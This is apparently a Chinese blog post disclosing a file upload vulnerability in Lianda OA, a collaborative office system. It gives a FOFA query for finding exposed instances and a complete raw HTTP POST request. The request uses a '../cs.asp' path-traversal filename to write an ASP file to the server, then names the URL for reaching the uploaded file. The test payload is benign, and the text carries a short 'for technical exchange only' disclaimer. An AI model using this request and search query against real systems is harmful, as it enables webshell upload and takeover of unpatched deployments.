联达OA 存在文件上传漏洞

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

联达oa是北京联达动力信息科技股份有限公司推出的一款功能强大的协同办公系统,旨在为企业提供高效、便捷的信息化管理解决方案,帮助企业实现信息化管理的升级,提升企业的整体竞争力。

资产搜索

fofa:

app="联达OA"

漏洞复现:

POST /FileManage/UpLoadFile.aspx HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 263
Content-Type: multipart/form-data; boundary=07800d96bad08d24dd59e3285dc16968

--07800d96bad08d24dd59e3285dc16968
Content-Disposition: form-data; name="file"; filename="../cs.asp"
Content-Type: image/png

ceshi
--07800d96bad08d24dd59e3285dc16968
Content-Disposition: form-data; name="DesignId"

1
--07800d96bad08d24dd59e3285dc16968--

上传成功后访问:

http://127.0.0.1/FileManage/cs.asp

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值